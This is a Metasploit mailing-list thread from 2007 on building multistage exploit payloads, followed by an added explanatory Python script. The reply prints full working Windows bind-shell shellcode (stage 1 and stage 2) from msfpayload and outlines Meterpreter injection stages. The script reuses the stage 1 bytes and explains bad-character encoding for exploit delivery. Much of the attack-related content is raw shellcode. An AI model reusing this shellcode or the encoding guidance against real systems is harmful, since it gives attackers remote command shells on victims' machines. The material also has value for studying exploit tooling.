Metasploit mailing list archives

Building multistage payloaded exploits?


From: j_fast_and_the_furious at hotmail.com (scotty to hotty)
Date: Mon, 24 Sep 2007 23:02:15 +0000


Thanks hdm for clarifying my research :P. Now, I noticed problems when I specify bad characters in Metasploit... it
always spits the payload out with the bad characters still in the exploit... When I use msf2 it works fine, but when I
use msf3 it keeps everything I specify to get removed. Any workarounds to this problem? Or am I doing something wrong?

> ----------------------------------------
> From: hdm at metasploit.com
> To: framework at metasploit.com
> Date: Mon, 24 Sep 2007 16:36:36 -0500
> Subject: Re: [framework] Building multistage payloaded exploits?
>
> The multistaged stuff isn't simple to implement outside of Metasploit.
> There are intermediate stages and in some cases (Meterpreter) entire
> client-side libraries that need to be used.
>
> If you want to use a "simple" stager (2 pieces), then msfpayload will
> generate the correct blocks for you. For example:
>
> $ msfpayload windows/shell/bind_tcp LPORT=12345 C
> /*
>  * windows/shell/bind_tcp - 201 bytes (stage 1)
>  * http://www.metasploit.com
>  * EXITFUNC=seh, LPORT=12345
>  */
> unsigned char buf[] =
> "\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
> "\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
> "\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
> "\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
> "\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
> "\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
> "\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
> "\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x53\x43\x53\x43\x53"
> "\x89\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6"
> "\x66\xb9\xa8\x6f\xff\xd6\x97\x66\x68\x30\x39\x66\x53\x89\xe1"
> "\x6a\x10\x51\x57\x66\xb9\x80\x3b\xff\xd6\x53\x57\x66\xb9\x75"
> "\x49\xff\xd6\x54\x54\x54\x57\x66\xb9\x32\x4c\xff\xd6\x97\x50"
> "\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"
> "\x66\xb9\xc0\x38\xff\xe6";
>
> /*
>  * windows/shell/bind_tcp - 474 bytes (stage 2)
>  * http://www.metasploit.com
>  */
> unsigned char buf[] =
> "\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
> "\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
> "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
> "\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
> "\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
> "\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
> "\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
> "\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
> "\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
> "\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
> "\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
> "\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
> "\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
> "\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
> "\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
> "\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
> "\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
> "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
> "\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
> "\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
> "\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
> "\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
> "\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
> "\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
> "\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
> "\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
> "\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
> "\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
> "\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
> "\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
> "\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
> "\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";
>
> If you want to use VNCInject or Meterpreter, it looks like:
>
> 1) Send the basic stager (same as stage 1 above)
> 2) Send the intermediate stager (89 bytes)
> 3) Send the DLLInject stager (~2800 bytes)
> 4) Send the DLL itself (150k~+ bytes)
> 5) Talk to the payload socket and handle the DLL
> 6) Handle VNC or Meterpreter protocols
>
> Use something like Wireshark to match up the exploit output (sending
> stage...) with the network traffic. If it was trivial, we would not have
> needed all this Ruby code to do it ;-)
>
> -HD
>
>
> On Monday 24 September 2007 16:12, scotty to hotty wrote:
>> Well, since you're on, I was wondering if you can point me to an exploit
>> with multistaged payloads? I need to learn how to do it in multiple
>> stages instead of single... I would like to find out how to do a
>> multistage instead of single; heck, I even tried finding out how using
>> Paterva Maltego and it couldn't find anything I didn't already know...
>>
>> and
>>
>> On Saturday 22 September 2007 20:34, scotty to hotty wrote:
>> Can anyone help me out on how I could add some multistaged payload to
>> my exploit? I only know how to use single stage shellcodes... Any help
>> will be appreciated.
>>
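The two questions in this thread (bad characters, and what a two-stage payload actually consists of) meet in the msfpayload `C` dump quoted above. Only stage 1 goes through the exploit's input vector, so that is the only block whose bytes have to avoid the exploit's bad characters; stage 2 is read by the stager straight off the socket as raw bytes, where nulls or newlines are harmless. The script below is an added example, not code from the thread or from Metasploit: it splits a `C` dump into its stages, checks each declared size against the bytes actually printed, and reports bad-character hits per stage. The stage 1 block is copied verbatim from HD's reply; the stage 2 block is a constructed 16-byte stand-in (not real msfpayload output) so the listing stays short.

```python
"""Split an `msfpayload <payload> C` dump into its stages and scan for bad chars."""
import re

# Constructed sample input for this example. The first block is the stage 1
# dump exactly as it appears in HD's reply; the second block is NOT real
# msfpayload output: a 16-byte stand-in (with embedded nulls) used so the
# example stays short while still showing a second stage.
MSFPAYLOAD_C_OUTPUT = r'''
/*
 * windows/shell/bind_tcp - 201 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=seh, LPORT=12345
 */
unsigned char buf[] =
"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
"\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
"\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
"\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
"\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
"\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
"\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
"\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x53\x43\x53\x43\x53"
"\x89\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6"
"\x66\xb9\xa8\x6f\xff\xd6\x97\x66\x68\x30\x39\x66\x53\x89\xe1"
"\x6a\x10\x51\x57\x66\xb9\x80\x3b\xff\xd6\x53\x57\x66\xb9\x75"
"\x49\xff\xd6\x54\x54\x54\x57\x66\xb9\x32\x4c\xff\xd6\x97\x50"
"\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"
"\x66\xb9\xc0\x38\xff\xe6";

/*
 * windows/shell/bind_tcp - 16 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\xc3";
'''

# One msfpayload C block: a header comment of the form "name - N bytes (stage k)"
# followed by an `unsigned char buf[] = "..." "...";` string literal.
BLOCK_RE = re.compile(
    r'/\*\s*\*\s*(?P<name>\S+)\s*-\s*(?P<size>\d+)\s+bytes\s*\((?P<stage>[^)]*)\)'
    r'.*?\*/\s*unsigned\s+char\s+buf\[\]\s*=\s*(?P<body>(?:"[^"]*"\s*)+);',
    re.S,
)
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_msfpayload_c(text):
    """Return one dict per stage: name, declared_size, stage label, raw bytes."""
    stages = []
    for m in BLOCK_RE.finditer(text):
        data = bytes.fromhex(''.join(HEX_RE.findall(m.group('body'))))
        stages.append({'name': m.group('name'),
                       'declared_size': int(m.group('size')),
                       'stage': m.group('stage'),
                       'data': data})
    return stages


def find_bad_chars(data, badchars):
    """Return [(offset, byte_value), ...] for every bad-char occurrence in data."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def check_stages(text, badchars=b'\x00\x0a\x0d'):
    """Parse a dump and report bad-char hits per stage.

    Only stage 1 is delivered through the exploit's input vector, so hits
    there are fatal (that stage needs an encoder pass). Later stages are
    read by the stager off the socket as raw bytes, so hits there are
    reported for information only.
    """
    report = []
    for s in parse_msfpayload_c(text):
        hits = find_bad_chars(s['data'], badchars)
        report.append({'name': s['name'],
                       'stage': s['stage'],
                       'size_ok': len(s['data']) == s['declared_size'],
                       'hits': hits,
                       'fatal': bool(hits) and s['stage'] == 'stage 1'})
    return report


if __name__ == '__main__':
    for r in check_stages(MSFPAYLOAD_C_OUTPUT):
        where = ', '.join('0x%02x@%d' % (b, off) for off, b in r['hits']) or 'none'
        print('%s (%s): size_ok=%s, bad chars: %s%s' % (
            r['name'], r['stage'], r['size_ok'], where,
            '  <-- needs encoding' if r['fatal'] else ''))
```

Against the default bad-character list the report flags one hit in stage 1, the 0x0d at offset 37 (part of the stager's hash loop), and that is the only hit that would break an exploit whose vector strips carriage returns; it is the case where the stage has to go through an encoder (in msf3, msfencode's -b list) before it is usable. The nulls in the stage 2 block are reported but not fatal, because that block never passes through the input filter at all.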
